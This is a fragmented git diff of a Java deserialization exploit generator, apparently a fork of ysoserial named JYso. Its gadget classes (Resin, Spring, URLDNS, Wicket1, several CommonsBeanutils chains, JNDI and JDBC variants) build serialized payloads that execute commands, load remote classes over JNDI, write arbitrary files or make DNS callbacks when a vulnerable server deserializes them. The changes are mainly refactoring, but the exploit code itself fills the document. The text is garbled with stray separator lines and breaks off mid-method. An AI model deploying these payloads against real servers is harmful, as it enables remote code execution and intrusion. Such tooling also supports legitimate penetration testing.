// Assuming JDKUtil class with makeJNDIRowSet method
|
||||||
public static JdbcRowSetImpl makeJNDIRowSet(String jndiUrl) throws Exception {
|
public static JdbcRowSetImpl makeJNDIRowSet(String jndiUrl) throws Exception {
|
||||||
|
|||||||
@@ -9,6 +9,7 @@ import java.awt.image.BufferedImage;
|
|||||||
import java.io.ByteArrayInputStream;
|
import java.io.ByteArrayInputStream;
|
||||||
import java.net.InetAddress;
|
import java.net.InetAddress;
|
||||||
|
|
||||||
|
@SuppressWarnings({"unused"})
|
||||||
@Dependencies({"javax.media:jai-codec-1.1.3"})
|
@Dependencies({"javax.media:jai-codec-1.1.3"})
|
||||||
public class RenderedImage implements ObjectPayload<Object> {
|
public class RenderedImage implements ObjectPayload<Object> {
|
||||||
public static byte hexToByte(String inHex) {
|
public static byte hexToByte(String inHex) {
|
||||||
|
|||||||
@@ -13,6 +13,7 @@ import java.util.Hashtable;
|
|||||||
|
|
||||||
import static com.qi4l.JYso.gadgets.utils.Utils.makeMap;
|
import static com.qi4l.JYso.gadgets.utils.Utils.makeMap;
|
||||||
|
|
||||||
|
@SuppressWarnings({"unused"})
|
||||||
public class Resin implements ObjectPayload<Object> {
|
public class Resin implements ObjectPayload<Object> {
|
||||||
public static Object makeToStringTrigger(Object o) throws Exception {
|
public static Object makeToStringTrigger(Object o) throws Exception {
|
||||||
String unhash = unhash(o.hashCode());
|
String unhash = unhash(o.hashCode());
|
||||||
@@ -66,7 +67,7 @@ public class Resin implements ObjectPayload<Object> {
|
|||||||
Reflections.setFieldValue(cpe, "stackTrace", null);
|
Reflections.setFieldValue(cpe, "stackTrace", null);
|
||||||
//考虑换成其他的
|
//考虑换成其他的
|
||||||
URI uri = new URI(command);
|
URI uri = new URI(command);
|
||||||
String args[] = {uri.getScheme() + "://" + uri.getAuthority(), uri.getPath().substring(1)};
|
String[] args = {uri.getScheme() + "://" + uri.getAuthority(), uri.getPath().substring(1)};
|
||||||
cpe.setResolvedObj(new Reference("Foo", args[1], args[0]));
|
cpe.setResolvedObj(new Reference("Foo", args[1], args[0]));
|
||||||
|
|
||||||
Reflections.setFieldValue(cpe, "suppressedExceptions", null);
|
Reflections.setFieldValue(cpe, "suppressedExceptions", null);
|
||||||
|
|||||||
@@ -1,7 +1,6 @@
|
|||||||
package com.qi4l.JYso.gadgets;
|
package com.qi4l.JYso.gadgets;
|
||||||
|
|
||||||
import cn.hutool.core.comparator.PropertyComparator;
|
import cn.hutool.core.comparator.PropertyComparator;
|
||||||
import com.qi4l.JYso.gadgets.utils.Gadgets;
|
|
||||||
import com.qi4l.JYso.gadgets.utils.Reflections;
|
import com.qi4l.JYso.gadgets.utils.Reflections;
|
||||||
import com.qi4l.JYso.gadgets.utils.SignedObjectUtils;
|
import com.qi4l.JYso.gadgets.utils.SignedObjectUtils;
|
||||||
import com.qi4l.JYso.gadgets.utils.dirty.DirtyDataWrapper;
|
import com.qi4l.JYso.gadgets.utils.dirty.DirtyDataWrapper;
|
||||||
@@ -48,6 +47,8 @@ import static java.lang.Class.forName;
|
|||||||
* 最后2个类型是脏数据类型和长度,为0则不混淆
|
* 最后2个类型是脏数据类型和长度,为0则不混淆
|
||||||
* @author QI4L
|
* @author QI4L
|
||||||
*/
|
*/
|
||||||
|
|
||||||
|
@SuppressWarnings({"rawtypes", "unchecked","unused"})
|
||||||
public class SignedObject implements ObjectPayload<Object> {
|
public class SignedObject implements ObjectPayload<Object> {
|
||||||
|
|
||||||
public Object getObject(String command) throws Exception {
|
public Object getObject(String command) throws Exception {
|
||||||
|
|||||||
@@ -67,7 +67,7 @@ public class Spring1 implements ObjectPayload<Object> {
|
|||||||
forName("org.springframework.core.SerializableTypeWrapper$TypeProvider"));
|
forName("org.springframework.core.SerializableTypeWrapper$TypeProvider"));
|
||||||
|
|
||||||
final Constructor mitpCtor = Reflections.getFirstCtor("org.springframework.core.SerializableTypeWrapper$MethodInvokeTypeProvider");
|
final Constructor mitpCtor = Reflections.getFirstCtor("org.springframework.core.SerializableTypeWrapper$MethodInvokeTypeProvider");
|
||||||
final Object mitp = mitpCtor.newInstance(typeProviderProxy, Object.class.getMethod("getClass", new Class[]{}), 0);
|
final Object mitp = mitpCtor.newInstance(typeProviderProxy, Object.class.getMethod("getClass"), 0);
|
||||||
Reflections.setFieldValue(mitp, "methodName", "newTransformer");
|
Reflections.setFieldValue(mitp, "methodName", "newTransformer");
|
||||||
|
|
||||||
return mitp;
|
return mitp;
|
||||||
|
|||||||
@@ -29,6 +29,7 @@ import static java.lang.Class.forName;
|
|||||||
* @author mbechler
|
* @author mbechler
|
||||||
*/
|
*/
|
||||||
|
|
||||||
|
@SuppressWarnings({"unused"})
|
||||||
@Dependencies({
|
@Dependencies({
|
||||||
"org.springframework:spring-core:4.1.4.RELEASE", "org.springframework:spring-aop:4.1.4.RELEASE",
|
"org.springframework:spring-core:4.1.4.RELEASE", "org.springframework:spring-aop:4.1.4.RELEASE",
|
||||||
// test deps
|
// test deps
|
||||||
|
|||||||
@@ -3,12 +3,13 @@ package com.qi4l.JYso.gadgets;
|
|||||||
import com.qi4l.JYso.gadgets.annotation.Dependencies;
|
import com.qi4l.JYso.gadgets.annotation.Dependencies;
|
||||||
import org.springframework.transaction.jta.JtaTransactionManager;
|
import org.springframework.transaction.jta.JtaTransactionManager;
|
||||||
|
|
||||||
|
@SuppressWarnings({"unused"})
|
||||||
@Dependencies({"org.springframework:spring-tx:5.2.3.RELEASE", "org.springframework:spring-context:5.2.3.RELEASE", "javax.transaction:javax.transaction-api:1.2"})
|
@Dependencies({"org.springframework:spring-tx:5.2.3.RELEASE", "org.springframework:spring-context:5.2.3.RELEASE", "javax.transaction:javax.transaction-api:1.2"})
|
||||||
public class Spring3 implements ObjectPayload<Object> {
|
public class Spring3 implements ObjectPayload<Object> {
|
||||||
@Override
|
@Override
|
||||||
public Object getObject(String command) throws Exception {
|
public Object getObject(String command) throws Exception {
|
||||||
|
|
||||||
String jndiURL = null;
|
String jndiURL;
|
||||||
if (command.toLowerCase().startsWith("jndi:")) {
|
if (command.toLowerCase().startsWith("jndi:")) {
|
||||||
jndiURL = command.substring(5);
|
jndiURL = command.substring(5);
|
||||||
} else {
|
} else {
|
||||||
|
|||||||
@@ -33,6 +33,8 @@ import java.util.List;
|
|||||||
* HashMap.hash()
|
* HashMap.hash()
|
||||||
* URL.hashCode()
|
* URL.hashCode()
|
||||||
*/
|
*/
|
||||||
|
|
||||||
|
@SuppressWarnings({"unused"})
|
||||||
@Dependencies()
|
@Dependencies()
|
||||||
@Authors({Authors.GEBL})
|
@Authors({Authors.GEBL})
|
||||||
public class URLDNS implements ObjectPayload<Object> {
|
public class URLDNS implements ObjectPayload<Object> {
|
||||||
@@ -66,14 +68,14 @@ public class URLDNS implements ObjectPayload<Object> {
|
|||||||
};
|
};
|
||||||
|
|
||||||
|
|
||||||
public static List<Object> list = new LinkedList();
|
public static List<Object> list = new LinkedList<>();
|
||||||
|
|
||||||
public static Object getURLDNSGadget(String urls, String clazzName) throws Exception {
|
public static Object getURLDNSGadget(String urls, String clazzName) throws Exception {
|
||||||
HashMap<Object, Object> hashMap = new HashMap<Object, Object>();
|
HashMap<Object, Object> hashMap = new HashMap<>();
|
||||||
URL url = new URL("http://" + urls);
|
URL url = new URL("http://" + urls);
|
||||||
Field f = Class.forName("java.net.URL").getDeclaredField("hashCode");
|
Field f = Class.forName("java.net.URL").getDeclaredField("hashCode");
|
||||||
f.setAccessible(true);
|
f.setAccessible(true);
|
||||||
f.set(url, Integer.valueOf(0));
|
f.set(url, 0);
|
||||||
Class<?> clazz = null;
|
Class<?> clazz = null;
|
||||||
|
|
||||||
if (clazzName != null) {
|
if (clazzName != null) {
|
||||||
@@ -85,7 +87,7 @@ public class URLDNS implements ObjectPayload<Object> {
|
|||||||
}
|
}
|
||||||
|
|
||||||
hashMap.put(url, clazz);
|
hashMap.put(url, clazz);
|
||||||
f.set(url, Integer.valueOf(-1));
|
f.set(url, -1);
|
||||||
return hashMap;
|
return hashMap;
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -543,8 +545,8 @@ public class URLDNS implements ObjectPayload<Object> {
|
|||||||
break;
|
break;
|
||||||
|
|
||||||
case "all":
|
case "all":
|
||||||
for (int i = 0; i < defaultClass.length; i++) {
|
for (String aClass : defaultClass) {
|
||||||
setList(defaultClass[i], dnsLog);
|
setList(aClass, dnsLog);
|
||||||
}
|
}
|
||||||
break;
|
break;
|
||||||
default:
|
default:
|
||||||
|
|||||||
@@ -6,6 +6,8 @@ import java.lang.reflect.Constructor;
|
|||||||
//jdk高版本移除此类
|
//jdk高版本移除此类
|
||||||
//通过getter方法触发命令注入
|
//通过getter方法触发命令注入
|
||||||
//本地测试 zulu8u345 存在此类
|
//本地测试 zulu8u345 存在此类
|
||||||
|
|
||||||
|
@SuppressWarnings({"unused"})
|
||||||
public class UnixPrintService implements ObjectPayload<Object>{
|
public class UnixPrintService implements ObjectPayload<Object>{
|
||||||
@Override
|
@Override
|
||||||
public Object getObject(String command) throws Exception {
|
public Object getObject(String command) throws Exception {
|
||||||
|
|||||||
@@ -5,6 +5,7 @@ import sun.misc.Unsafe;
|
|||||||
|
|
||||||
import java.lang.reflect.Field;
|
import java.lang.reflect.Field;
|
||||||
|
|
||||||
|
@SuppressWarnings({"unused"})
|
||||||
public class UnixPrintServiceLookup implements ObjectPayload<Object>{
|
public class UnixPrintServiceLookup implements ObjectPayload<Object>{
|
||||||
@Override
|
@Override
|
||||||
public Object getObject(String command) throws Exception {
|
public Object getObject(String command) throws Exception {
|
||||||
|
|||||||
@@ -64,7 +64,7 @@ public class Vaadin1 implements ObjectPayload<Object> {
|
|||||||
templates = Gadgets.createTemplatesImpl(command);
|
templates = Gadgets.createTemplatesImpl(command);
|
||||||
PropertysetItem pItem = new PropertysetItem();
|
PropertysetItem pItem = new PropertysetItem();
|
||||||
|
|
||||||
NestedMethodProperty<Object> nmprop = new NestedMethodProperty<Object>(templates, "outputProperties");
|
NestedMethodProperty<Object> nmprop = new NestedMethodProperty<>(templates, "outputProperties");
|
||||||
pItem.addItemProperty("outputProperties", nmprop);
|
pItem.addItemProperty("outputProperties", nmprop);
|
||||||
|
|
||||||
BadAttributeValueExpException b = new BadAttributeValueExpException("");
|
BadAttributeValueExpException b = new BadAttributeValueExpException("");
|
||||||
|
|||||||
@@ -9,8 +9,8 @@ import org.apache.wicket.util.io.ThresholdingOutputStream;
|
|||||||
import org.apache.wicket.util.upload.DiskFileItem;
|
import org.apache.wicket.util.upload.DiskFileItem;
|
||||||
|
|
||||||
import java.io.File;
|
import java.io.File;
|
||||||
import java.io.IOException;
|
|
||||||
import java.io.OutputStream;
|
import java.io.OutputStream;
|
||||||
|
import java.nio.charset.StandardCharsets;
|
||||||
import java.util.Arrays;
|
import java.util.Arrays;
|
||||||
|
|
||||||
/**
|
/**
|
||||||
@@ -41,24 +41,25 @@ import java.util.Arrays;
|
|||||||
* $ cat /tmp/upload_3805815b_2d50_4e00_9dae_a854d5a0e614_479431761.tmp
|
* $ cat /tmp/upload_3805815b_2d50_4e00_9dae_a854d5a0e614_479431761.tmp
|
||||||
* blue lobster
|
* blue lobster
|
||||||
*/
|
*/
|
||||||
|
@SuppressWarnings({"unused"})
|
||||||
@Dependencies({"org.apache.wicket:wicket-util:6.23.0", "org.slf4j:slf4j-api:1.6.4"})
|
@Dependencies({"org.apache.wicket:wicket-util:6.23.0", "org.slf4j:slf4j-api:1.6.4"})
|
||||||
@Authors({Authors.JACOBAINES})
|
@Authors({Authors.JACOBAINES})
|
||||||
public class Wicket1 implements ReleaseableObjectPayload<DiskFileItem> {
|
public class Wicket1 implements ReleaseableObjectPayload<DiskFileItem> {
|
||||||
private static DiskFileItem copyAndDelete(String copyAndDelete, String copyTo) throws IOException, Exception {
|
private static DiskFileItem copyAndDelete(String copyAndDelete, String copyTo) throws Exception {
|
||||||
return makePayload(0, copyTo, copyAndDelete, new byte[1]);
|
return makePayload(0, copyTo, copyAndDelete, new byte[1]);
|
||||||
}
|
}
|
||||||
|
|
||||||
// writes data to a random filename (update_<per JVM random UUID>_<COUNTER>.tmp)
|
// writes data to a random filename (update_<per JVM random UUID>_<COUNTER>.tmp)
|
||||||
private static DiskFileItem write(String dir, byte[] data) throws IOException, Exception {
|
private static DiskFileItem write(String dir, byte[] data) throws Exception {
|
||||||
return makePayload(data.length + 1, dir, dir + "/whatever", data);
|
return makePayload(data.length + 1, dir, dir + "/whatever", data);
|
||||||
}
|
}
|
||||||
|
|
||||||
// writes data to an arbitrary file
|
// writes data to an arbitrary file
|
||||||
private static DiskFileItem writeOldJRE(String file, byte[] data) throws IOException, Exception {
|
private static DiskFileItem writeOldJRE(String file, byte[] data) throws Exception {
|
||||||
return makePayload(data.length + 1, file + "\0", file, data);
|
return makePayload(data.length + 1, file + "\0", file, data);
|
||||||
}
|
}
|
||||||
|
|
||||||
private static DiskFileItem makePayload(int thresh, String repoPath, String filePath, byte[] data) throws IOException, Exception {
|
private static DiskFileItem makePayload(int thresh, String repoPath, String filePath, byte[] data) throws Exception {
|
||||||
// if thresh < written length, delete outputFile after copying to repository temp file
|
// if thresh < written length, delete outputFile after copying to repository temp file
|
||||||
// otherwise write the contents to repository temp file
|
// otherwise write the contents to repository temp file
|
||||||
File repository = new File(repoPath);
|
File repository = new File(repoPath);
|
||||||
@@ -84,11 +85,11 @@ public class Wicket1 implements ReleaseableObjectPayload<DiskFileItem> {
|
|||||||
if ("copyAndDelete".equals(parts[0])) {
|
if ("copyAndDelete".equals(parts[0])) {
|
||||||
return copyAndDelete(parts[1], parts[2]);
|
return copyAndDelete(parts[1], parts[2]);
|
||||||
} else if ("write".equals(parts[0])) {
|
} else if ("write".equals(parts[0])) {
|
||||||
return write(parts[1], parts[2].getBytes("US-ASCII"));
|
return write(parts[1], parts[2].getBytes(StandardCharsets.US_ASCII));
|
||||||
} else if ("writeB64".equals(parts[0])) {
|
} else if ("writeB64".equals(parts[0])) {
|
||||||
return write(parts[1], Base64.decodeBase64(parts[2]));
|
return write(parts[1], Base64.decodeBase64(parts[2]));
|
||||||
} else if ("writeOld".equals(parts[0])) {
|
} else if ("writeOld".equals(parts[0])) {
|
||||||
return writeOldJRE(parts[1], parts[2].getBytes("US-ASCII"));
|
return writeOldJRE(parts[1], parts[2].getBytes(StandardCharsets.US_ASCII));
|
||||||
} else if ("writeOldB64".equals(parts[0])) {
|
} else if ("writeOldB64".equals(parts[0])) {
|
||||||
return writeOldJRE(parts[1], Base64.decodeBase64(parts[2]));
|
return writeOldJRE(parts[1], Base64.decodeBase64(parts[2]));
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -12,7 +12,7 @@ import java.util.PriorityQueue;
|
|||||||
import static com.qi4l.JYso.gadgets.utils.InjShell.insertField;
|
import static com.qi4l.JYso.gadgets.utils.InjShell.insertField;
|
||||||
import static com.qi4l.JYso.gadgets.utils.jdk17Bypass.patchModule;
|
import static com.qi4l.JYso.gadgets.utils.jdk17Bypass.patchModule;
|
||||||
|
|
||||||
@SuppressWarnings("rawtypes")
|
@SuppressWarnings({"rawtypes", "unchecked","unused"})
|
||||||
@Dependencies({"commons-beanutils:commons-beanutils:1.6.0"})
|
@Dependencies({"commons-beanutils:commons-beanutils:1.6.0"})
|
||||||
public class cb160 implements ObjectPayload<Object> {
|
public class cb160 implements ObjectPayload<Object> {
|
||||||
|
|
||||||
@@ -23,8 +23,10 @@ public class cb160 implements ObjectPayload<Object> {
|
|||||||
ClassPool pool = ClassPool.getDefault();
|
ClassPool pool = ClassPool.getDefault();
|
||||||
CtClass ctClass = pool.get("org.apache.commons.beanutils.BeanComparator");
|
CtClass ctClass = pool.get("org.apache.commons.beanutils.BeanComparator");
|
||||||
insertField(ctClass, "serialVersionUID", "private static final long serialVersionUID = 2573799559215537819;");
|
insertField(ctClass, "serialVersionUID", "private static final long serialVersionUID = 2573799559215537819;");
|
||||||
|
return getCbSink_1(ctClass,template);
|
||||||
|
}
|
||||||
|
|
||||||
|
public static Object getCbSink_1(CtClass ctClass, Object template) throws Exception {
|
||||||
Class<?> beanCompareClazz = ctClass.toClass();
|
Class<?> beanCompareClazz = ctClass.toClass();
|
||||||
BeanComparator comparator = (BeanComparator) beanCompareClazz.newInstance();
|
BeanComparator comparator = (BeanComparator) beanCompareClazz.newInstance();
|
||||||
final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);
|
final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);
|
||||||
|
|||||||
@@ -2,15 +2,13 @@ package com.qi4l.JYso.gadgets;
|
|||||||
|
|
||||||
import com.qi4l.JYso.gadgets.annotation.Dependencies;
|
import com.qi4l.JYso.gadgets.annotation.Dependencies;
|
||||||
import com.qi4l.JYso.gadgets.utils.Gadgets;
|
import com.qi4l.JYso.gadgets.utils.Gadgets;
|
||||||
import com.qi4l.JYso.gadgets.utils.Reflections;
|
|
||||||
import javassist.ClassPool;
|
import javassist.ClassPool;
|
||||||
import javassist.CtClass;
|
import javassist.CtClass;
|
||||||
import org.apache.commons.beanutils.BeanComparator;
|
|
||||||
|
|
||||||
import java.util.PriorityQueue;
|
|
||||||
|
|
||||||
|
import static com.qi4l.JYso.gadgets.cb160.getCbSink_1;
|
||||||
import static com.qi4l.JYso.gadgets.utils.InjShell.insertField;
|
import static com.qi4l.JYso.gadgets.utils.InjShell.insertField;
|
||||||
|
|
||||||
|
@SuppressWarnings({"unused"})
|
||||||
@Dependencies({"commons-beanutils:commons-beanutils:1.8.3", "commons-beanutils:commons-beanutils:1.7X"})
|
@Dependencies({"commons-beanutils:commons-beanutils:1.8.3", "commons-beanutils:commons-beanutils:1.7X"})
|
||||||
public class cb183 implements ObjectPayload<Object> {
|
public class cb183 implements ObjectPayload<Object> {
|
||||||
|
|
||||||
@@ -22,18 +20,6 @@ public class cb183 implements ObjectPayload<Object> {
|
|||||||
CtClass ctClass = pool.get("org.apache.commons.beanutils.BeanComparator");
|
CtClass ctClass = pool.get("org.apache.commons.beanutils.BeanComparator");
|
||||||
|
|
||||||
insertField(ctClass, "serialVersionUID", "private static final long serialVersionUID = -3490850999041592962L;");
|
insertField(ctClass, "serialVersionUID", "private static final long serialVersionUID = -3490850999041592962L;");
|
||||||
|
return getCbSink_1(ctClass,template);
|
||||||
Class<?> beanCompareClazz = ctClass.toClass();
|
|
||||||
BeanComparator comparator = (BeanComparator) beanCompareClazz.newInstance();
|
|
||||||
final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);
|
|
||||||
queue.add("1");
|
|
||||||
queue.add("1");
|
|
||||||
|
|
||||||
// switch method called by comparator
|
|
||||||
Reflections.setFieldValue(comparator, "property", "outputProperties");
|
|
||||||
Reflections.setFieldValue(comparator, "comparator", String.CASE_INSENSITIVE_ORDER);
|
|
||||||
Reflections.setFieldValue(queue, "queue", new Object[]{template, template});
|
|
||||||
|
|
||||||
return queue;
|
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -8,6 +8,7 @@ import org.apache.commons.beanutils.BeanComparator;
|
|||||||
|
|
||||||
import java.util.PriorityQueue;
|
import java.util.PriorityQueue;
|
||||||
|
|
||||||
|
@SuppressWarnings({"rawtypes", "unchecked","unused"})
|
||||||
@Dependencies({"commons-beanutils:commons-beanutils:1.9.2", "commons-collections:commons-collections:3.1", "commons-logging:commons-logging:1.2"})
|
@Dependencies({"commons-beanutils:commons-beanutils:1.9.2", "commons-collections:commons-collections:3.1", "commons-logging:commons-logging:1.2"})
|
||||||
@Authors({Authors.FROHOFF})
|
@Authors({Authors.FROHOFF})
|
||||||
public class cb192 implements ObjectPayload<Object> {
|
public class cb192 implements ObjectPayload<Object> {
|
||||||
|
|||||||
@@ -8,41 +8,48 @@ import com.qi4l.JYso.gadgets.utils.SuClassLoader;
|
|||||||
import com.sun.org.apache.xerces.internal.dom.AttrNSImpl;
|
import com.sun.org.apache.xerces.internal.dom.AttrNSImpl;
|
||||||
import com.sun.org.apache.xerces.internal.dom.CoreDocumentImpl;
|
import com.sun.org.apache.xerces.internal.dom.CoreDocumentImpl;
|
||||||
import com.sun.org.apache.xml.internal.security.c14n.helper.AttrCompare;
|
import com.sun.org.apache.xml.internal.security.c14n.helper.AttrCompare;
|
||||||
import javassist.ClassClassPath;
|
import javassist.*;
|
||||||
import javassist.ClassPool;
|
|
||||||
import javassist.CtClass;
|
|
||||||
import javassist.CtField;
|
|
||||||
|
|
||||||
import java.util.Comparator;
|
import java.util.Comparator;
|
||||||
import java.util.PriorityQueue;
|
import java.util.PriorityQueue;
|
||||||
|
|
||||||
|
@SuppressWarnings({"rawtypes", "unchecked","unused"})
|
||||||
@Dependencies({"commons-beanutils:commons-beanutils:1.8.3", "commons-beanutils:commons-beanutils:1.7X"})
|
@Dependencies({"commons-beanutils:commons-beanutils:1.8.3", "commons-beanutils:commons-beanutils:1.7X"})
|
||||||
@Authors({"SummerSec"})
|
@Authors({"SummerSec"})
|
||||||
public class cb_AttrCompare183 implements ObjectPayload<Object> {
|
public class cb_AttrCompare183 implements ObjectPayload<Object> {
|
||||||
@Override
|
@Override
|
||||||
public Object getObject(String command) throws Exception {
|
public Object getObject(String command) throws Exception {
|
||||||
final Object template;
|
Object template = Gadgets.createTemplatesImpl(command);
|
||||||
template = Gadgets.createTemplatesImpl(command);
|
|
||||||
AttrNSImpl attrNS1 = new AttrNSImpl();
|
AttrNSImpl attrNS1 = new AttrNSImpl();
|
||||||
CoreDocumentImpl coreDocument = new CoreDocumentImpl();
|
CoreDocumentImpl coreDocument = new CoreDocumentImpl();
|
||||||
attrNS1.setValues(coreDocument, "1", "1", "1");
|
attrNS1.setValues(coreDocument, "1", "1", "1");
|
||||||
|
|
||||||
|
|
||||||
|
Comparator beanComparator = getCbSink_2();
|
||||||
|
Reflections.setFieldValue(beanComparator, "comparator", new AttrCompare());
|
||||||
|
|
||||||
|
return getCbSink_3(beanComparator, attrNS1, template);
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
static Comparator getCbSink_2() throws Exception {
|
||||||
ClassPool pool = ClassPool.getDefault();
|
ClassPool pool = ClassPool.getDefault();
|
||||||
pool.insertClassPath(new ClassClassPath(Class.forName("org.apache.commons.beanutils.BeanComparator")));
|
pool.insertClassPath(new ClassClassPath(Class.forName("org.apache.commons.beanutils.BeanComparator")));
|
||||||
final CtClass ctBeanComparator = pool.get("org.apache.commons.beanutils.BeanComparator");
|
final CtClass ctBeanComparator = pool.get("org.apache.commons.beanutils.BeanComparator");
|
||||||
try {
|
try {
|
||||||
CtField ctSUID = ctBeanComparator.getDeclaredField("serialVersionUID");
|
CtField ctSUID = ctBeanComparator.getDeclaredField("serialVersionUID");
|
||||||
ctBeanComparator.removeField(ctSUID);
|
ctBeanComparator.removeField(ctSUID);
|
||||||
} catch (javassist.NotFoundException e) {
|
} catch (NotFoundException ignored) {
|
||||||
}
|
}
|
||||||
ctBeanComparator.addField(CtField.make("private static final long serialVersionUID = -3490850999041592962L;", ctBeanComparator));
|
ctBeanComparator.addField(CtField.make("private static final long serialVersionUID = -3490850999041592962L;", ctBeanComparator));
|
||||||
final Comparator beanComparator = (Comparator) ctBeanComparator.toClass(new SuClassLoader()).newInstance();
|
final Comparator beanComparator = (Comparator) ctBeanComparator.toClass(new SuClassLoader()).newInstance();
|
||||||
|
|
||||||
ctBeanComparator.defrost();
|
ctBeanComparator.defrost();
|
||||||
|
return beanComparator;
|
||||||
|
}
|
||||||
|
|
||||||
Reflections.setFieldValue(beanComparator, "comparator", new AttrCompare());
|
static Object getCbSink_3(Comparator beanComparator, Object attrNS1, Object template) throws Exception {
|
||||||
PriorityQueue<Object> queue = new PriorityQueue<Object>(2, (Comparator<? super Object>) beanComparator);
|
PriorityQueue<Object> queue = new PriorityQueue<>(2, (Comparator<? super Object>) beanComparator);
|
||||||
|
|
||||||
queue.add(attrNS1);
|
queue.add(attrNS1);
|
||||||
queue.add(attrNS1);
|
queue.add(attrNS1);
|
||||||
|
|||||||
@@ -3,15 +3,14 @@ package com.qi4l.JYso.gadgets;
|
|||||||
import com.qi4l.JYso.gadgets.annotation.Authors;
|
import com.qi4l.JYso.gadgets.annotation.Authors;
|
||||||
import com.qi4l.JYso.gadgets.annotation.Dependencies;
|
import com.qi4l.JYso.gadgets.annotation.Dependencies;
|
||||||
import com.qi4l.JYso.gadgets.utils.Gadgets;
|
import com.qi4l.JYso.gadgets.utils.Gadgets;
|
||||||
import com.qi4l.JYso.gadgets.utils.Reflections;
|
|
||||||
import com.sun.org.apache.xerces.internal.dom.AttrNSImpl;
|
import com.sun.org.apache.xerces.internal.dom.AttrNSImpl;
|
||||||
import com.sun.org.apache.xerces.internal.dom.CoreDocumentImpl;
|
import com.sun.org.apache.xerces.internal.dom.CoreDocumentImpl;
|
||||||
import com.sun.org.apache.xml.internal.security.c14n.helper.AttrCompare;
|
import com.sun.org.apache.xml.internal.security.c14n.helper.AttrCompare;
|
||||||
import org.apache.commons.beanutils.BeanComparator;
|
import org.apache.commons.beanutils.BeanComparator;
|
||||||
|
|
||||||
import java.util.PriorityQueue;
|
import static com.qi4l.JYso.gadgets.cb_AttrCompare183.getCbSink_3;
|
||||||
|
|
||||||
|
|
||||||
|
@SuppressWarnings({"rawtypes", "unchecked","unused"})
|
||||||
@Dependencies({"commons-beanutils:commons-beanutils:1.9.2"})
|
@Dependencies({"commons-beanutils:commons-beanutils:1.9.2"})
|
||||||
@Authors({"水滴"})
|
@Authors({"水滴"})
|
||||||
public class cb_AttrCompare192 implements ObjectPayload<Object> {
|
public class cb_AttrCompare192 implements ObjectPayload<Object> {
|
||||||
@@ -25,14 +24,6 @@ public class cb_AttrCompare192 implements ObjectPayload<Object> {
|
|||||||
|
|
||||||
BeanComparator beanComparator = new BeanComparator(null, new AttrCompare());
|
BeanComparator beanComparator = new BeanComparator(null, new AttrCompare());
|
||||||
|
|
||||||
PriorityQueue<Object> queue = new PriorityQueue<Object>(2, beanComparator);
|
return getCbSink_3(beanComparator, attrNS1, template);
|
||||||
|
|
||||||
queue.add(attrNS1);
|
|
||||||
queue.add(attrNS1);
|
|
||||||
|
|
||||||
Reflections.setFieldValue(queue, "queue", new Object[]{template, template});
|
|
||||||
Reflections.setFieldValue(beanComparator, "property", "outputProperties");
|
|
||||||
|
|
||||||
return queue;
|
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -8,7 +8,7 @@ import org.apache.commons.beanutils.BeanComparator;
|
|||||||
|
|
||||||
import java.util.PriorityQueue;
|
import java.util.PriorityQueue;
|
||||||
|
|
||||||
@SuppressWarnings({"rawtypes", "unchecked"})
|
@SuppressWarnings({"rawtypes", "unchecked","unused"})
|
||||||
@Dependencies({"commons-beanutils:commons-beanutils:1.9.2"})
|
@Dependencies({"commons-beanutils:commons-beanutils:1.9.2"})
|
||||||
@Authors({Authors.QI4L})
|
@Authors({Authors.QI4L})
|
||||||
public class cb_JDBC implements ObjectPayload<Object> {
|
public class cb_JDBC implements ObjectPayload<Object> {
|
||||||
|
|||||||
@@ -9,6 +9,7 @@ import org.apache.commons.beanutils.BeanComparator;
|
|||||||
import java.math.BigInteger;
|
import java.math.BigInteger;
|
||||||
import java.util.PriorityQueue;
|
import java.util.PriorityQueue;
|
||||||
|
|
||||||
|
@SuppressWarnings({"rawtypes", "unchecked","unused"})
|
||||||
@Dependencies({"commons-beanutils:commons-beanutils:1.9.2", "commons-collections:commons-collections:3.1"})
|
@Dependencies({"commons-beanutils:commons-beanutils:1.9.2", "commons-collections:commons-collections:3.1"})
|
||||||
@Authors({Authors.QI4L})
|
@Authors({Authors.QI4L})
|
||||||
public class cb_JNDI implements ObjectPayload<Object> {
|
public class cb_JNDI implements ObjectPayload<Object> {
|
||||||
|
|||||||
@@ -4,17 +4,14 @@ import com.qi4l.JYso.gadgets.annotation.Authors;
|
|||||||
import com.qi4l.JYso.gadgets.annotation.Dependencies;
|
import com.qi4l.JYso.gadgets.annotation.Dependencies;
|
||||||
import com.qi4l.JYso.gadgets.utils.Gadgets;
|
import com.qi4l.JYso.gadgets.utils.Gadgets;
|
||||||
import com.qi4l.JYso.gadgets.utils.Reflections;
|
import com.qi4l.JYso.gadgets.utils.Reflections;
|
||||||
import com.qi4l.JYso.gadgets.utils.SuClassLoader;
|
|
||||||
import javassist.ClassClassPath;
|
|
||||||
import javassist.ClassPool;
|
|
||||||
import javassist.CtClass;
|
|
||||||
import javassist.CtField;
|
|
||||||
import org.apache.commons.lang3.compare.ObjectToStringComparator;
|
import org.apache.commons.lang3.compare.ObjectToStringComparator;
|
||||||
|
|
||||||
import java.util.Comparator;
|
import java.util.Comparator;
|
||||||
import java.util.PriorityQueue;
|
|
||||||
|
|
||||||
|
import static com.qi4l.JYso.gadgets.cb_AttrCompare183.getCbSink_2;
|
||||||
|
import static com.qi4l.JYso.gadgets.cb_AttrCompare183.getCbSink_3;
|
||||||
|
|
||||||
|
@SuppressWarnings({"rawtypes", "unused"})
|
||||||
@Dependencies({"commons-beanutils:commons-beanutils:1.8.3", "org.apache.commons:commons-lang3:3.10", "commons-beanutils:commons-beanutils:1.7X"})
|
@Dependencies({"commons-beanutils:commons-beanutils:1.8.3", "org.apache.commons:commons-lang3:3.10", "commons-beanutils:commons-beanutils:1.7X"})
|
||||||
@Authors({"SummerSec"})
|
@Authors({"SummerSec"})
|
||||||
public class cb_ObjectToStringComparator183 implements ObjectPayload<Object> {
|
public class cb_ObjectToStringComparator183 implements ObjectPayload<Object> {
|
||||||
@@ -22,29 +19,12 @@ public class cb_ObjectToStringComparator183 implements ObjectPayload<Object> {
|
|||||||
public Object getObject(String command) throws Exception {
|
public Object getObject(String command) throws Exception {
|
